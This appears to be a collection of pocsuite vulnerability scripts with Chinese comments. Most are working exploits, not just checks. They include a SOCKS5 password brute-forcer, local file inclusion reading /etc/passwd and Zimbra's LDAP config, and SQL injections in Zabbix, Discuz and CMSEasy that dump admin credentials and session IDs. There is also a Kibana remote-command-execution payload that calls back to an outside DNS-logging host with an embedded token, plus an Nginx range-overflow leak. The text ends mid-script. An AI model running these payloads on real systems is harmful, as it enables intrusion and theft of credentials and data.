#!/usr/bin/env python
#coding=utf-8
import socket
#import traceback
import struct
# 多线程爆破 节省时间
from threading import Thread

# 将输入的url转换为ip:port，供socket使用
from pocsuite3.lib.utils import url2ip
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE


class Socks_unauth_POC(POCBase):
    vulID = 'Socks-unauthorized-access'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    appName = 'Socks'
    appVersion = ''
    category = POC_CATEGORY.EXPLOITS.REMOTE
    vulType = VUL_TYPE.INFORMATION_DISCLOSURE

    vulDate = '2020-04-27'  # 漏洞公开的时间,不知道就写今天
    author = 'shadowsock5'  # PoC作者的大名
    createDate = '2020-04-27'  # 编写 PoC 的日期
    updateDate = '2020-04-27'  # PoC 更新的时间,默认和编写时间一样
    references = ['http://zhihan.me/network/2017/09/24/socks5-protocol/', 'https://www.jianshu.com/p/d03310004668']  # 漏洞地址来源,0day不用写
    name = 'Socks未授权访问漏洞'  # PoC 名称
    cvss = u"低危"


    def _verify(self):
        result={}

        vul_url = self.url
        target_url = vul_url

        host, port = url2ip(target_url, True)  

        # 包含了空用户名/空密码的情况。这时候任何用户名密码都可以登录成功
        usernames = ['admin', 'test', '']
        passwords = ['123456', 'admin', 'root', 'password', '123123', '123', '1', '',
                    'P@ssw0rd!!', 'qwa123', '12345678', 'test', '123qwe!@#',
                    '123456789', '123321', '1314520', '666666', 'woaini', 'fuckyou', '000000',
                    '1234567890', '8888888', 'qwerty', '1qaz2wsx', 'abc123', 'abc123456',
                    '1q2w3e4r', '123qwe', '159357', 'p@ssw0rd', 'p@55w0rd', 'password!',
                    'p@ssw0rd!', 'password1', 'r00t', 'system', '111111']
        try:

            self.flag = False  # 初始化
            self._username = ''
            self._password = ''
            
            threads = []

            for username in usernames:
                for password in passwords:
                    _thread = Thread(target=self.validate, args=(host, port, username, password))
                    _thread.start()
                    threads.append(_thread)
                    

            # 等待所有线程完成
            for t in threads:
                t.join()


            #flag = self.validate(host, port, "cqq", "cqq")
            #print(flag)

            if self.flag:
                print(self._username)
                print(self._password)
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = target_url
                return self.save_output(result)
            return self.save_output(result)
        except Exception as e:
            print(e)
        
        return self.save_output(result)


    #漏洞攻击
    def _attack(self):
        self._verify()


    def validate(self, host, port, username, password):
        try:
            s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
            socket.setdefaulttimeout(5)
            s.connect((host,port))

            # socks5握手
            # 0x05 SOCKS5协议版本 
            # 0x02 支持的认证方法数量 
            # 0x00 免认证 
            # 0x02 账号密码认证
            payload1=b'\x05\x02\x00\x02'

            
            s.send(payload1)

            data1=s.recv(1024)
            #print(data1)

            
            # 需要认证  会返回\x05\x02
            # 不需要认证 会返回\x05\x00
            if data1[1] ==0:   # 表示不需要认证
                self.flag = True
                s.close()
                return True
            

            #payload = b'\x01\x03\x63\x71\x71\x04\x70\x61\x73\x72'
            #payload = b'\x01' + struct.pack('>H', len(user)) + user.encode() + struct.pack('>H', len(passwd)) + passwd.encode()
            user_len_b =  struct.pack('b', len(username))    # 使用b的时候，才是一个字节，否则使用>H 为两个字节
            user_b =      username.encode()
            
            pass_len_b =  struct.pack('b', len(password))
            pass_b =      password.encode()
            
            payload2 = b'\x01' + user_len_b +  user_b + pass_len_b + pass_b
            #print(payload2)

            
            # 发送socks5认证
            # 0x01 子协商版本
            # 0x03 用户名长度
            # 0x63 0x71 0x71 转换为ascii字符之后为"cqq"
            # 0x04 密码长度
            # 0x70 0x61 0x73 0x73 转换为ascii字符之后"pass"
            s.send(payload2)
            data2=s.recv(1024)
            #print(data2)

            if data2[1] ==0: #success
                print('Username:%s \tPassword:%s\nSuccess!'%(username,password))
                self._username = username
                self._password = password
                self.flag = True
                return
            else:
                print('Auth Fail!')
                p_flag=False
            s.close()
        except Exception as e:
            p_flag=False
            if s:
                s.close()


    def save_output(self, result):
        #判断有无结果并输出
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output

register_poc(Socks_unauth_POC)



#!/usr/bin/env python
# -*- coding:utf-8 -*-



from pocsuite.net import req

from pocsuite.poc import Output, POCBase

from pocsuite.utils import register



class TestPOC(POCBase):

    vulID = '87159'

    version = '1'

    vulDate = '1406390400'

    createDate = '1442937600'

    references = ['http://www.sebug.net/vuldb/ssvid-87159']

    name = 'DirPHP LFI Vulnerability'

    appPowerLink = 'http://sourceforge.net/projects/dirphp/'

    appName = 'DirPHP'

    appVersion = '1.0'

    vulType = 'Local File Inclusion'

    desc = '''DirPHP index.php文件在处理传入的参数时存在缺陷，导致产生本地文件包含漏洞。'''

    samples = ['']



    def _attack(self):

        return self._verify()



    def _verify(self, verify=True):

        result = {}

        vul_url = '%s/index.php?phpfile=/etc/passwd' % self.url

        response = req.get(vul_url, timeout=10).content



        if 'bin/bash' in response:

            result['VerifyInfo'] = {}

            result['VerifyInfo']['URL'] = self.url



        return self.parse_attack(result)



    def parse_attack(self, result):

        output = Output(self)



        if result:

            output.success(result)

        else:

            output.fail('failed')



        return output

register(TestPOC)


#!/usr/bin/env python
#_*_ encoding: utf-8 _*_
from pocsuite3.api import register_poc
from pocsuite3.api import requests
from pocsuite3.api import Output
from pocsuite3.api import logger
from pocsuite3.api import POCBase
import re
from urllib import parse

class Zabbix(POCBase):
    vulID = 'N/A'
    version = '1.0'
    author = 'big04dream'
    vulDate = ''
    createDate = '2019-11-06'
    updateDate = '2019-11-06'
    references = ['']
    name = 'Zabbix 2.2 < 3.0.3 - jsrpc 参数profileIdx2 insert注入漏洞'
    appPowerLink = ''
    appName = 'Zabbix'
    appVersion = 'Zabbix 2.2 < 3.0.3'
    vulType = 'SQL Injection'
    desc = ''' 
    Zabbix 2.2 < 3.0.3 - jsrpc 参数profileIdx2 insert注入漏洞
    '''

    def _verify(self):
        result = {}
        payload = "jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=999'&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1"
        try:
            if self.url[-1] == '/':
                url = self.url + payload
            else:
                url = self.url + '/' + payload
            response = requests.get(url, timeout=10)
            key_reg = re.compile(r"INSERT\s*INTO\s*profiles")
            if key_reg.findall(response.text):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['Payload'] = payload
        except Exception as e:
            logger.info(e)
        return self.parse_output(result)

    def _sql_inject(self, sql):
        payload = "jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=" + parse.quote(
            sql) + "&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1"
        if self.url[-1] == '/':
            url = self.url + payload
        else:
            url = self.url + '/' + payload
        try:
            reg = re.compile(r"Duplicate\s*entry\s*'~(.+?)~1")
            response = requests.get(url, timeout=10)
            result = reg.findall(response.text)
            if result:
                return result[0]
        except Exception as e:
            logger.info(e)
        return False

    def _attack(self):
        result = {}
        passwd_sql = "(select 1 from(select count(*),concat((select (select (select concat(0x7e,(select concat(name,0x3a,passwd) from  users limit 0,1),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
        session_sql = "(select 1 from(select count(*),concat((select (select (select concat(0x7e,(select sessionid from sessions limit 0,1),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
        res = self._sql_inject(passwd_sql)
        if res:
            res = res.split(':')
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['Payload'] = passwd_sql
            result['VerifyInfo']['Payload2'] = session_sql
            result['AdminInfo']['Username'] = res[0]
            result['AdminInfo']['Password'] = res[1]
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Not vulnerability')
        return output

register_poc(Zabbix)


#!/usr/bin/env python
# coding: utf-8

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import re

class TestPOC(POCBase):
    vulID = 'SSV-12193'  # vul ID
    version = '1'
    author = ['hh']
    vulDate = '2009-09-02'
    createDate = '2015-10-21'
    updateDate = '2015-10-21'
    references = ['https://www.exploit-db.com/exploits/9576/']
    name = 'Discuz! Plugin JiangHu <= 1.1 (id) SQL Injection Vulnerability'
    appPowerLink = 'www.discuz.net'
    appName = 'Discuz! Plugin JiangHu Inn'
    appVersion = '1.1'
    vulType = 'SQL Injection'
    desc = '''
        Discuz!中的JiangHu Inn plugin 1.1及其早期版本中存在SQL注入漏洞，
        远程攻击者可以借助 forummission.php的显示操作中的id参数执行任意SQL指令。
        d0rk    : inurl:forummission.php
    '''
    # the sample sites for examine
    samples = ['']

    def _verify(self):
        result = {}
        target_url =  "/forummission.php?index=show&id=24 and+1=2+union+select+1,2,concat(0x7162787671,0x50664e68584e4c584352,0x716a717171),4,5,6,7,8,9,10,11 from cdb_members--"
        response = req.get(self.url + target_url, headers=self.headers, timeout=10)
        content = response.content     
        match = re.search('qbxvqPfNhXNLXCRqjqqq',content)
        #拼接一个特殊字符串，验证concat函数是否成功执行
        if match:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url + target_url
        return self.parse_attack(result)

    def _attack(self):
        return self._verify()

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet Nothing returned')
        return output

register(TestPOC)


#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import re


class TestPOC(POCBase):
    vulID = '68611'  # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2010-06-01'
    createDate = '2015-12-08'
    updateDate = '2015-12-08'
    references = ['http://www.sebug.net/vuldb/ssvid-68611']
    name = 'Joomla Component com_jequoteform - Local File Inclusion'
    appPowerLink = 'www.joomla.org'
    appName = 'Joomla Component com_jequoteform'
    appVersion = 'N/A'
    vulType = 'Local File Inclusion'
    desc = '''
		Joomla!的JE Quotation Form (com_jequoteform)组件存在目录遍历漏洞。
		远程攻击者可以借助脚本index.php中的view参数中的".."符读取任意的文件，也可能导致其他未明影响。
    '''
    samples = ['']

    def _attack(self):
        result = {}
        return self.parse_output(result)

    def _verify(self):
        # 下面以读取/etc/passwd文件的内容为例子验证漏洞
        result = {}
        filename = '/etc/passwd'
        url = '/index.php'
        exploit = '?option=com_jequoteform&view='
        dBs = '../' * 5 + '..'
        ends = '%00'
        # 测试的URL地址
        vulurl = self.url + url + exploit + dBs + filename + ends
        # 伪造的HTTP头
        httphead = {
            'Host': 'www.google.com',
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Connection': 'keep-alive'
        }
        resp = req.get(vulurl, headers=httphead, timeout=50)
        if resp.status_code == 200 and re.match('root:.+?:0:0:.+?:.+?:.+?', resp.content):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vulurl
            result['Fileinfo'] = {}
            result['Fileinfo']['Filename'] = filename
            result['Fileinfo']['Content'] = resp.content
        return self.parse_output(result)

    def parse_output(self, result):
        # parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



from cvpoc.api import POCBase, register_poc, requests, parse_output


class CvPOC(POCBase):
    # cv_id = 1  # 极光无限漏洞库唯一编号

    # 验证方法
    def _verify(self):
        result = {}
        # 验证命中返回True,验证失败返回False
        p = self._check(self.url)
        result['status'] = p
        # 解析结果
        return parse_output(result)

    def _check(self, url):
        flag = 'PHP Extension Build'
        data = "_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1"

        payloads = [
            r"/index.php?s=captcha"
        ]
        for payload in payloads:
            vul_url = url + payload
            headers = {
                "Content-Type": "application/x-www-form-urlencoded"
            }
            r = requests.post(vul_url, data=data, headers=headers)

            if flag in r.text:
                return True
        return False


register_poc(CvPOC)



#!/usr/bin/env python
# coding: utf-8
import subprocess
import re
from urllib.parse import urlparse
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE


class TestPOC(POCBase):
    vulID = '0'
    version = '1.0'
    author = 'hancool'
    vulDate = '2019-1-10'
    createDate = '2019-1-10'
    updateDate = '2019-1-10'
    references = ['https://github.com/anexia-it/winshock-test', ]
    name = 'winshock (MS14-066) Check'
    appPowerLink = 'https://docs.microsoft.com/en-us/security-updates/securitybulletins/2014/ms14-066'
    appName = 'windows'
    appVersion = 'All'
    vulType = VUL_TYPE.CODE_EXECUTION
    category = POC_CATEGORY.EXPLOITS.REMOTE
    desc = '''
    This script tries to determine whether the target system has the
    winshock (MS14-066) patches applied or not.
    This is done by checking if the SSL ciphers introduced by MS14-066 are
    available on the system.
    Authors:
        Stephan Peijnik <speijnik@anexia-it.com>
    注意：
    POC借鉴的是https://github.com/anexia-it/winshock-test，将shell脚本改为python;由于是调用的openssl进行远程验证，
    在测试中发现可能会出现openssl卡住而使Pocsuite卡死的情况。
    '''

    def _verify(self):
        # The OpenSSL cipher names for these ciphers are:
        MS14_066_CIPHERS = "DHE-RSA-AES256-GCM-SHA384 DHE-RSA-AES128-GCM-SHA256 AES256-GCM-SHA384 AES128-GCM-SHA256"
        # Ciphers supported by Windows Server 2012R2
        WINDOWS_SERVER_2012R2_CIPHERS = "ECDHE-RSA-AES256-SHA384 ECDHE-RSA-AES256-SHA"

        def shell_execute(args):
            stdout, _ = subprocess.Popen('echo -n | {} 2>&1'.format(' '.join(
                args)), stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True).communicate()
            return stdout

        def check_openssl_ciphers():
            cmd_args = ['openssl', 'ciphers']
            ciphers_openssl = shell_execute(cmd_args).decode('utf-8')
            for cipher_test in MS14_066_CIPHERS.split(' '):
                if cipher_test not in ciphers_openssl:
                    return (False, 'OpenSSL does not support {} cipher'.format(cipher_test))
            return (True, 'ok')

        def check_cipher(cipher_test, url, global_options, windows_server_2012_or_later_test=False):
            cmd_args = ['openssl', 's_client',
                        '-cipher', cipher_test, '-connect', url]
            results = shell_execute(cmd_args).decode('utf-8')
            if 'connect:errno=' in results:
                return (False, 'Connection error')
            elif 'SSL23_GET_SERVER_HELLO:unknown protocol' in results:
                return (False, 'No SSL/TLS support on target port.')
            elif 'SSL_CTX_set_cipher_list:no cipher match' in results:
                return (False, 'Your version of OpenSSL is not supported.')
            elif 'Cipher is {}'.format(cipher_test) in results or 'Cipher    : {}'.format(cipher_test) in results:
                return (True, 'SUPPORTED')
            else:
                return (True, 'UNSUPPORTED')

        def check_ms14_066_cipher(url, global_options):
            support = False
            result = []
            for cipher_test in MS14_066_CIPHERS.split(' '):
                status, response = check_cipher(
                    cipher_test, url, global_options)
                if not status:
                    raise Exception(response)
                result.append('{}:{}'.format(cipher_test, response))
                if response == 'SUPPORTED':
                    support = True
                    if global_options['patched'] == 'no':
                        global_options['patched'] = 'yes'

            return (support, result)

        def check_windows_server_2012_or_later(url, global_options):
            support = False
            result = []
            for cipher_test in WINDOWS_SERVER_2012R2_CIPHERS.split(' '):
                status, response = check_cipher(
                    cipher_test, url, global_options, windows_server_2012_or_later_test=True)
                result.append('{}:{}'.format(cipher_test, response))
                if response == 'SUPPORTED':
                    support = True
                    if global_options['windows_server_2012_or_later'] == 'no':
                        global_options['windows_server_2012_or_later'] = 'yes'
                        break

            return (support, result)

        def check_iis_443(host, global_options):
            cmd_args = ['curl', '-k', '-I', 'https://{}'.format(host)]
            results = shell_execute(cmd_args).decode('utf-8')
            if 'Microsoft-IIS' in results:
                m = re.findall(r'Server: Microsoft-IIS/(.+)', results)
                if m:
                    iis_version = m[0].strip()
                    global_options['iis_detected'] = 'yes'
                    if iis_version == '8.5':
                        global_options['windows_server_2012_or_later'] = 'yes'
                        global_options['windows_server_2012_r2'] = 'yes'
                    elif iis_version == '8.0':
                        global_options['windows_server_2012_or_later'] = 'yes'
                        global_options['windows_server_2012_r2'] = 'no'
                    return True

            return False

        def check(host, port):
            # 全局参数
            global_options = {'patched': 'no', 'windows_server_2012_or_later': 'no',
                              'windows_server_2012_r2': 'no', 'iis_detected': 'no'}
            url = '{}:{}'.format(host, port)
            # 检查是否存在openssl和支持相应的协议
            openssl_support, _ = check_openssl_ciphers()
            if not openssl_support:
                return False
            # 检查ms14-066
            support, result = check_ms14_066_cipher(url, global_options)
            # 如果是端口是443，则检查是否是IIS，并根据IIS来检测是否是windows_server_2012_or_later
            if port == 443:
                check_iis_443(host, global_options)
            if global_options['windows_server_2012_or_later'] == 'no' and global_options['iis_detected'] == 'no':
                support_2, result_2 = check_windows_server_2012_or_later(
                    url, global_options)
                support |= support_2
                result += result_2
            # 根据检测结果，判断patched状态
            if global_options['patched'] == 'yes' and global_options['windows_server_2012_or_later'] == 'no':
                PATCHED = 'YES'
            elif global_options['patched'] == 'yes':
                PATCHED = 'UNKNOWN'
                if global_options['windows_server_2012_r2'] == 'yes':
                    PATCHED = "{}: Windows_Server_2012_R2_detected.".format(
                        PATCHED)
                else:
                    PATCHED = "{}: Windows_Server_2012_or_later_detected.".format(
                        PATCHED)
            else:
                PATCHED = 'NO'
            result.append('patched:{}'.format(PATCHED))
            # 根据对SSL的支持和PATCHED结果，判断是否存在漏洞
            if support and PATCHED == 'NO':
                return (True, ' '.join(result))
            else:
                return (False, ' '.join(result))

        result = {}
        pr = urlparse(self.url)
        if pr.port:  # and pr.port not in ports:
            ports = [pr.port]
        else:
            ports = [3389, 13389, 23389]
        for port in ports:
            try:
                status, msg = check(pr.hostname, port)
                if status:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = '{}:{}'.format(
                        pr.hostname, port)
                    result['extra'] = {}
                    result['extra']['evidence'] = msg
                    break
            except:
                raise
                pass

        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not vulnerability')
        return output


register_poc(TestPOC)



#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""
from pocsuite.api.request import req 
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase


class MongodbPOC(POCBase):
    vulID = '2'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1' #默认为1
    vulDate = '2017-02-22' #漏洞公开的时间,不知道就写今天

    author = 'ly55521' #  PoC作者的大名
    createDate = '2017-02-22'# 编写 PoC 的日期
    updateDate = '2017-02-22'# PoC 更新的时间,默认和编写时间一样
    references = 'http://0535code.com/article/20161125_1255.shtml'# 漏洞地址来源,0day不用写
    name = 'Mongodb Unauthorized access'# PoC 名称
    appPowerLink = 'https://www.mongodb.org/'# 漏洞厂商主页地址
    appName = 'Mongodb'# 漏洞应用名称
    appVersion = 'all versions'# 漏洞影响版本
    vulType = 'weak-pass'#漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        Mongodb未授权漏洞
    ''' # 漏洞简要描述
    samples = []# 测试样列,就是用 PoC 测试成功的网站
    install_requires = [] # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"严重" #严重,高危,中危,低危

    #验证漏洞 pocsuite -r 2-mongodb.py -u 1.1.1.1 --verify
    def _verify(self):
        #定义返回结果
        result = {}
        #获取漏洞url
        vul_url = '%s' % self.url

        #如果设置端口则取端口,没有设置则为默认端口
        import re
        from pocsuite.lib.utils.funs import url2ip
        _port = re.findall(':(\d+)\s*', vul_url)
        if len(_port) != 0:
            _host = url2ip(vul_url)[0]
            _port = url2ip(vul_url)[1]
        else :
            _host = url2ip(vul_url)
            _port = "27017"

        test_url = str( "http://" + _host + ":" + _port)
        #print vul_url
        try:
            response = req.get(url=test_url,timeout=5,allow_redirects=False).content #禁止重定向
        except Exception as e:
            response = ""
        """
        It looks like you are trying to access MongoDB over HTTP on the native driver port.
        """
        if ("access" in response) and ("MongoDB" in response) and ("port" in response):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = test_url
            result['VerifyInfo']['Payload'] = "HTTP GET"
        else:
            result = {}
        print('[+]2 poc done')
        return self.save_output(result)

    #漏洞攻击
    def _attack(self):
        result = {}
        # 攻击代码
        return self._verify()

    def save_output(self, result):
        #判断有无结果并输出
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output

register(MongodbPOC)




#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pocsuite.api.request import req  # 用法和 requests 完全相同
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
import socket
from dns import resolver, query, exception


class Nginx_Interger_Overflow_Poc(POCBase):
    vulID = "CVE-2017-7529"
    version = "1"
    author = "akame"
    vulDate = "2017-8-12"
    createDate = "2017-8-12"
    updateDate = "2017-8-12"
    # 漏洞地址来源,0day不用写
    references = ['http://www.freebuf.com/articles/terminal/140402.html']
    name = 'CVE-2017-7529 Nginx整数溢出漏洞 PoC'  # PoC 名称
    appPowerLink = 'http://nginx.org/'  # 漏洞厂商主页地址
    appName = 'nginx'  # 漏洞应用名称
    appVersion = '0.5.6-1.13.2'  # 漏洞影响版本
    vulType = 'Information Disclosure'  # 漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        在Nginx的range filter中存在整数溢出漏洞，
        可以通过带有特殊构造的range的HTTP头的恶意请求引发这个整数溢出漏洞，并导致信息泄露。
    '''  # 漏洞简要描述
    samples = []  # 测试样列,就是用 PoC 测试成功的网站
    install_requires = []  # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写

    def _attack(self):
        vul_url = self.url
        result = {}
        headers = req.get(vul_url, timeout=10).headers
        file_len = headers["Content-Length"]
        headers = {"Range": "bytes=-{},-9223372036854{}".format(
            int(file_len) + 623, 776000 - (int(file_len) + 623))}
        r = req.get(vul_url, headers=headers)
        if r.status_code == 206 and "Content-Range" in r.content:
            result['content'] = r.content
        return self.parse_attack(result)

    def _verify(self, verify=True):
        vul_url = self.url
        result = {}
        headers = req.get(vul_url, timeout=10).headers
        file_len = headers["Content-Length"]
        headers = {"Range": "bytes=-{},-9223372036854{}".format(
            int(file_len) + 623, 776000 - (int(file_len) + 623))}
        r = req.get(vul_url, headers=headers)
        if r.status_code == 206 and "Content-Range" in r.content:
            result['desc'] = "Vuln url"
        return self.parse_attack(result)

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(Nginx_Interger_Overflow_Poc)



#!/usr/bin/python
# -*- coding: utf-8 -*-


from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    name = 'Zimbra LFI'
    vulID = '0'  # https://www.seebug.org/vuldb/ssvid-78176
    author = ['bey0nd']
    vulType = 'LFI'
    version = '1.0'    # default version: 1.0
    references = ['http://www.myhack58.com/Article/html/3/62/2013/41590.htm']
    desc = '''Zimbra文件包含,并可增加管理员.'''

    vulDate = '2013-02-14'
    createDate = '2013-02-14'
    updateDate = '2013-02-14'

    appName = 'Zimbra'
    appVersion = 'Zimbra'
    appPowerLink = 'zimbra'
    samples = ['']

    def _attack(self):
        '''attack mode'''
        return self._verify()

    def _verify(self):
        '''verify mode'''
        result = {}
        self.url = self.url + '/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00'
        
        resp = req.get(self.url)
        if resp and resp.text and resp.status_code == 200:
            if "zimbra_ldap_password" in resp.text or "zimbra_server_hostname" in resp.text:
                result['FileInfo'] = {}
                result['FileInfo']['Filename'] = "zimbra/conf/localconfig.xml"
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Failed')
        return output


register(TestPOC)



#!/usr/bin/env python
#_*_ encoding: utf-8 _*_

from pocsuite3.api import Output
from pocsuite3.api import POCBase
from pocsuite3.api import register_poc
from pocsuite3.api import requests
from pocsuite3.api import logger
from pocsuite3.lib.utils import random_str
from time import sleep

class Kibana(POCBase):
    vulID = '98089'
    version = '1.0'
    author = ['big04dream']
    vulDate = '2019-10-17'
    createDate = '2019-11-04'
    updateDate = '2019-11-04'
    references = ['https://www.seebug.org/vuldb/ssvid-98089']
    name = 'Kibana < 6.6.0 Timelion function remote command execution vulnerability'
    appPowerLink = 'http://www.elasticsearch.cn/'
    appName = 'kibana'
    appVersion = '< 6.6.0'
    vulType = 'rce'
    desc = '''
    Kibana < 6.6.0 Timelion功能远程命令执行漏洞
    '''

    def _headers(self):
        headers = {
            "Accept":"application/json,text/plain,*/*",
            "User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36",
            "Content-Type":"application/json;charset=UTF-8",
            "Accept-Encoding":"gzip, deflate",
            "Accept-Language":"zh-CN,zh;q=0.9",
            "Connection":"close",
            "kbn-version":"6.5.4"
        }
        return headers

    def _payload(self, cmd):
        payload = {
            "sheet": [".es(*).props(label.__proto__.env.AAAA='require(\"child_process\").exec(\"ping %s\");process.exit()//')\n.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')" % cmd],
            "time": {"from": "now-15m", "to": "now", "mode": "quick", "interval": "auto", "timezone": "Asia/Shanghai"}
        }
        return payload

    def _verify(self):
        result = {}
        headers = self._headers()
        cmd = random_str(16) + '.6eb4yw.ceye.io'
        payload = self._payload(cmd)
        try:
            if self.url[-1] == '/':
                url = self.url + 'api/timelion/run'
            else:
                url = self.url + '/api/timelion/run'
            requests.post(url, headers=headers, data=payload)
            sleep(2)
            res = requests.get('http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns')
            if cmd in res:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['Payload'] = payload
        except Exception as e:
            logger.info(e)
        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not vulnerability')
        return output

register_poc(Kibana)


#!/usr/bin/python
# -*- coding: utf-8 -*-


# If you have issues about development, please read:
# https://github.com/knownsec/Pocsuite/blob/master/docs/CODING.md
# https://github.com/knownsec/Pocsuite/blob/master/docs/COPYING

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import re


def send_command(url, cmd):
    try:
        httpreq = req.Session()
        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0',
                   'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                   'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
                   'Accept-Encoding': 'gzip, deflate',
                   'Content-Type': 'application/x-www-form-urlencoded',
                   'Content-Length': '255'}
        resp = httpreq.post(url, headers=headers, data='%s' % cmd)
    except:
        resp = None
    return resp


class TestPOC(POCBase):
    name = 'CMSEasy 5.5 /celive/live/header.php SQL注入漏洞 POC'.decode('utf-8')
    vulID = '0'  # https://www.seebug.org/vuldb/ssvid-78176
    author = ['baozi']
    vulType = 'sql_inj'
    version = '1.0'  # default version: 1.0
    references = ['http://wooyun.org/bugs/wooyun-2010-070827']
    desc = '''CMSEasy 5.5 /celive/live/header.php SQL注入漏洞 POC'''

    vulDate = '2013-02-14'
    createDate = '2013-02-14'
    updateDate = '2013-02-14'

    appName = 'CMSEasy_cms'
    appVersion = '5.5'
    appPowerLink = ''
    samples = ['']

    def _attack(self):
        '''attack mode'''
        result = {}
        self.url = self.url + "/celive/live/header.php"
        post = "xajax=LiveMessage&xajaxargs[0][name]=1',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(select concat(username,0x23,password) from cmseasy_user where groupid=2 limit 1))a from information_schema.tables group by a)b),'','','','1','127.0.0.1','2')#"
        resp = send_command(self.url, post)
        if resp and resp.text and resp.status_code == 200:
            info = re.findall(r'entry \'(.*?)\'', resp.text)
            if len(info) > 0:
                info1 = info[0].split('#', 1)
                result['Database'] = {}
                result['Database']['user'] = info1[0]
                result['Database']['password'] = info1[1]

        return self.parse_output(result)

    def _verify(self):
        '''verify mode'''
        return self._attack()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)


#!/usr/bin/env python
#coding:utf-8
# @Date    : 2016-07-25 19:00:00
# @Author  : DshtAnger(dshtanger@gmail.com)
# 

import string,random,hashlib,base64
import urlparse
from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase

class TestPOC(POCBase):
    vulID = '92096' #ssvid-92096
    version = '1'
    author = 'DshtAnger'
    vulDate = '2016-07-07'
    createDate = '2016-07-25'
    updateDate = '2016-07-25'
    references = ['https://www.seebug.org/vuldb/ssvid-92096']
    name = 'IPS Community Suite <= 4.1.12.3 Autoloaded PHP Remote Command Execution.'
